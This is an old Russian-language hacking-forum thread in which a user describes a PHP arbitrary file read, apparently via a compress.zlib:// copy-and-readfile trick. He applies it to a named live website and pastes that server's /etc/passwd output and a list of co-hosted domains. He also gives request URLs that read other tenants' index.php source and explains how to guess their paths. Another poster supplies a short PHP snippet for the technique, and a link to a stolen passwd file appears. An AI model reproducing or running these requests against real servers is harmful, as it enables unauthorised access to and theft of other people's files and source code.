ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.05.2006, 17:50
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
Уважаемы члены Members of Antichat, разобравшись с этой ошибкой (оказалось очень серьезной), я решил что выкладывать на всеобщее обозрение исходных моих трудов будет серьезной ошибкой, так как может повести много проблем. Из-за этого я решил что бы кто-нибудь из Вас опубликовал эту статью только в закрытой части форума. Я думаю, что Вы поймете почему. Пишите в личку.
Последний раз редактировалось DIAgen; 15.05.2006 в 18:06..
|
|
|
15.05.2006, 17:57
|
|
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553
Репутация:
1329
|
|
Если бы ещё через пост это всё пускать то вообще куль!
|
|
|
|
15.05.2006, 21:39
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
Молчание знак согласия, значит можно выкладывать статью на общяк!!!!
|
|
|
|
15.05.2006, 22:04
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Хочешь - мне скинь.  я в МОА. =) |
|
|
|
15.05.2006, 22:31
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
Современем можно и тут выложить конец статьи.
|
|
|
|
15.05.2006, 23:03
|
|
Banned
Регистрация: 14.05.2006
Сообщений: 8
Провел на форуме:
45799
Репутация:
-10
|
|
2DIAgen да нет... уязвимость написана была ещё на секлабе. да и зачем ты юзал такой длинный и неправильный код?:
Код:
if(!(copy("compress.zlib://$file", $temp)))die('error');
readfile($temp);
все а так молодец
---
только вот предложения так и не понял... так ты нашел уязвимость или не ты?
Последний раз редактировалось Li4inka; 15.05.2006 в 23:06..
|
|
|
|
16.05.2006, 01:19
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
Сообщение от Li4inka
только вот предложения так и не понял... так ты нашел уязвимость или не ты?
Я нашел хорошую лазейку, когда можно обойтись без root'a, конечно это сказано выкано, но для меня это открытие, так как я только осваиваю все это дело!
А нас счет скрипта, как я уже говорил, exploit'ov много но как правильно применить, главно упорсво.
Кому интересно
hxxp://ponce.inter.edu/forums/passwd.txt
может че найдете интересного!
Последний раз редактировалось DIAgen; 16.05.2006 в 01:21..
|
|
|
|
17.05.2006, 09:50
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
Решил выложить концовку:
Еще обнаружил интересную вещь, если нет доступа к папке, выдает сообщение что нет доступа. А самое интересное то, что можно читать файлы в этой директории. Значит задача остается в том, что бы определить истинный путь к файлам, и затем их читать!
Вот пара примеров на hxxp://www.aleviler.biz
/etc/passwd выдает вот это
PHP код:
mailman:x:72:67:GNU mailing list manager:/var/lib/mailman:/bin/bash
ldap:x:76:70:User for OpenLDAP:/var/lib/ldap:/bin/bash
radiusd:x:100:101:Radius daemon:/var/lib/radiusd:/bin/false
privoxy:x:101:102:Daemon user for privoxy:/var/lib/privoxy:/bin/false
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
web1:x:20071:102::/srv/www/htdocs/web1:/bin/false
web2:x:20072:102::/srv/www/htdocs/web2:/bin/false
web5:x:20077:102::/srv/www/htdocs/web5:/bin/false
web3:x:20074:102::/srv/www/htdocs/web3:/bin/false
web4:x:20076:102::/srv/www/htdocs/web4:/bin/false
web6:x:20078:102::/srv/www/htdocs/web6:/bin/false
web7:x:20079:102::/srv/www/htdocs/web7:/bin/false
web8:x:20080:102::/srv/www/htdocs/web8:/bin/false
На это хосте зарегистрированы следующие сайты
PHP код:
asflug.com, flirtcity.biz, internationale-buchhandlung.com, lust-auf-reise.com, powerstore.info, rentpark.net и т.д
На прямую он недает обратится к папка hxxp://www.aleviler.biz/hpmaker/qq.php?file=/srv/www/htdocs/web36/
PHP код:
Sorry... File
/srv/www/htdocs/web36/ dosen't exists or you don't have
access.
Но если обратится к файлам hxxt://www.aleviler.biz/hpmaker/qq.php?file=/srv/www/htdocs/web1/html/index.php
hxxt://www.aleviler.biz/hpmaker/qq.php?file=/srv/www/htdocs/web23/html/index.php
hxxt://www.aleviler.biz/hpmaker/qq.php?file=/srv/www/htdocs/web36/html/index.php
Выдается исходный код!!!
Алилуя!!! |
|
|
|
21.05.2006, 13:09
|
|
Новичок
Регистрация: 21.05.2006
Сообщений: 7
Провел на форуме:
172360
Репутация:
0
|
|
help
DIAgen, у меня такой вопрос возник:
Вот ты даешь ссылку hxxt://www.aleviler.biz/hpmaker/qq.php?file=/srv/www/htdocs/web36/html/index.php
как ты узнал вот этот адрес /srv/www/htdocs/web36/html/index.php ?!
Буду очень благодарен, если поможешь ! |
|
|
|
21.05.2006, 13:27
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
Сообщение от SMU-2X
DIAgen, у меня такой вопрос возник:
Вот ты даешь ссылку hxxt://www.aleviler.biz/hpmaker/qq.php?file=/srv/www/htdocs/web36/html/index.php
как ты узнал вот этот адрес /srv/www/htdocs/web36/html/index.php ?!
Буду очень благодарен, если поможешь ! Тебе просто надо изнать точный путь до скрипта который ты запустил.
Затем прочитав etc/passwd ты будешь знать какие еще есть сайты на сервере.
Потом уже методом тыка нужно подбирать пути, они будут различатся с твоим только на несколько папок.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
